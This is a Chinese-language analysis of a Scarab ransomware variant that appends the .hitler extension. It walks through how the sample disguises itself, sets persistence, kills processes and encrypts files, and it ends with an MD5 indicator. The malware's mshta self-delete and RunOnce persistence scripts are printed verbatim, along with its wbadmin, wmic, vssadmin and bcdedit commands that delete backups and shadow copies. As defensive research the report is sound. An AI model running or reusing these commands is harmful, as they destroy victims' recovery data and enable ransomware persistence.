FavoriteLoading
0

Scarab勒索病毒最新變種,希特勒“冠名”

事件描述

一、事件背景

深信服EDR安全團隊跟蹤了Scarab勒索病毒的最新變種,該變種文件加密后綴為.hitler,有趣的是,希特勒對應的英文就是hitler,算是莫名躺槍了。

圖片1.png通常,Scarab勒索病毒是利用Necurs僵尸網絡進行傳播的,Necurs是世界上最大的僵尸網絡之一,曾用于傳播多個惡意家族樣本。最近一段時間,發現Scarab勒索病毒還會通過RDP爆破+人工、捆綁軟件的方式進行傳播。

下圖,是此變種的勒索信息。

圖片2.png二、功能流程

此Scarab變種,其功能流程大致如下,依次分別為偽裝錄屏、屏幕快照、內存解密、設置啟動、自刪除、刪除卷影、殺進程、遍歷加密、勒索彈窗。

???????圖片3.png

偽裝錄屏,是為了騙過安全軟件,讓其誤以為是一個正常的錄屏軟件。此外,還截圖了屏幕快照。與多數病毒一樣,此勒索變種同樣會設置啟動,做持久化操作,也會做自刪除的動作。為了保證數據不可恢復,同時也做了刪除卷影的操作。

此外,此勒索病毒會殺掉多數的系統進程、應用進程、殺掉進程,最后遍歷文件夾,做加密。所有的文件加密成功后,彈出勒索信息。

三、詳細分析

1.查殼,母體樣本使用的是UPX加殼,如下所示:

圖片4.png

2.樣本使用了詳細的文件描述信息,如下所示:

????????????圖片5.png

3.脫殼分析,動態調試,如下所示:

圖片6.png4.錄制音頻,如下所示:

圖片7.png相應的反匯編代碼,如下所示:

圖片8.png5.創建窗口,如下所示:

圖片9.png6.獲取操作系統語言版本,如下所示:

圖片10.png7.設置HOOK,如下所示:

圖片11.png8.抓屏操作,如下所示:

圖片12.png9.啟動子進程,如下所示:

圖片13.png10.進行持久化操作,拷貝自身到%appdata%目錄下,如下所示:

圖片14.png拷貝之后,如下所示:

圖片15.png然后啟動%appdata%目錄下的sevnz.exe程序,如下所示:

圖片16.png11.解密內存相應的字符串,如下所示:

圖片17.png通過執行mshta.exe,刪除自身,如下所示:

圖片18.png相應的命令行,如下:

mshta.exe "[removed]o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('Scarab.exe');close()}catch(e){}},10);"

12.調用mshta.exe程序,設置自啟動項,如下所示:

圖片19.png相應的命令行,如下:

mshta.exe "[removed]o=new ActiveXObject('WScript.Shell');

x=new ActiveXObject('Scripting.FileSystemObject');

setInterval(function(){try{i=x.GetFile('sevnz.exe').Path;

o.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\iyryCNqPEUF',i);

}catch(e){}},10);"

設置完成之后,如下所示:

圖片20.png13.通過mshta.exe設置相應的注冊表項,如下所示:

圖片21.png將相應的刪除系統備份,磁盤卷影操作的命令行,設置為注冊表項,如下所示:

圖片22.png通過mshta.exe執行命令,如下所示:

圖片23.png相應的命令行,如下:

o=new ActiveXObject("WScript.Shell");

o.Run("cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0",0);

o.Run("cmd.exe /c wmic SHADOWCOPY DELETE",0);

o.Run("cmd.exe /c vssadmin Delete Shadows /All /Quiet",0);

o.Run("cmd.exe /c bcdedit /set {default} recoveryenabled No",0);

o.Run("cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures",0);

14.遍歷進程,如下所示:

圖片24.png發現相關的進程,則結束進程,如下所示:

圖片25.png相關進程列表如下:

ccleaner.exe;ccleaner64.exe;tasklist.exe;taskmgr.exe;regedit.exe;anvir.exe;

anvir64.exe;cscript.exe;wscript.exe;powershell.exe;procexp.exe;far.exe;

agntsvc.exe;agntsvc.exeagntsvc.exe;agntsvc.exeencsvc.exe;agntsvc.exeisqlplussvc.exe;

dbeng50.exe;dbsnmp.exe;excel.exe;firefoxconfig.exe;infopath.exe;isqlplussvc.exe;

msaccess.exe;msftesql.exe;mspub.exe;mydesktopqos.exe;mydesktopservice.exe;

mysqld.exe;mysqld-nt.exe;mysqld-opt.exe;ncsvc.exe;ocautoupds.exe;ocomm.exe;

ocssd.exe;onenote.exe;oracle.exe;outlook.exe;powerpnt.exe;sqbcoreservice.exe;

sqlagent.exe;sqlbrowser.exe;sqlserver.exe;sqlservr.exe;sqlwriter.exe;steam.exe;

synctime.exe;tbirdconfig.exe;thebat.exe;thebat64.exe;thunderbird.exe;visio.exe;

winword.exe;wordpad.exe;xfssvccon.exe;

15.內存解密出相應的加密字符串,然后設置為注冊表項,如下所示:

圖片26.png16.在內存中解密生成相應的勒索信息,用戶的加密ID,如下所示:

圖片27.png17.遍歷文件,內存中加密相應的文件,文件名隨機生成,文件后綴為hitler如下所示:

圖片28.png18.然后替換到原始的文件,如下所示:

圖片29.png19.然后設置加密后的文件屬性,如下所示:

圖片30.png20.遍歷文件的時候,會判斷是否為加密文件列表中的后綴,相應的后綴列表有二百多種,如下所示:

圖片31.png部分后綴名列表,如下所示:

圖片32.png21.同時會遍歷相應的文件目錄,排除以下文件目錄,相應的文件目錄列表如下:

\$RECYCLE.BIN\;

\All Users\;

\AppData\;

\ApplicationData\;

\System Volume Information\;

\Windows\;

\intel\;

\nvidia\;

\Trend Micro\;

22.在加密文件的目錄下,生成對應的勒索信息文本文件,然后將之前內存生成的勒索信息,寫入到文件,如下所示:

圖片33.png23.勒索信息文本文件HOW TO RECOVER ENCRYPTED FILES.TXT,最后通過執行notepad.exe程序,彈出相應的勒索信息,執行的命令行如下:notepad.exe ?"C:\Users\panda\HOW TO RECOVER ENCRYPTED FILES.TXT"

四、IOC

MD5

374F8ACCC92838939A6D3960AAB36AA0

【聲明】:8090安全小組門戶(http://www.jvwkvg.tw)登載此文出于傳遞更多信息之目的,并不代表本站贊同其觀點和對其真實性負責,僅適于網絡安全技術愛好者學習研究使用,學習中請遵循國家相關法律法規。如有問題請聯系我們,聯系郵箱[email protected],我們會在最短的時間內進行處理。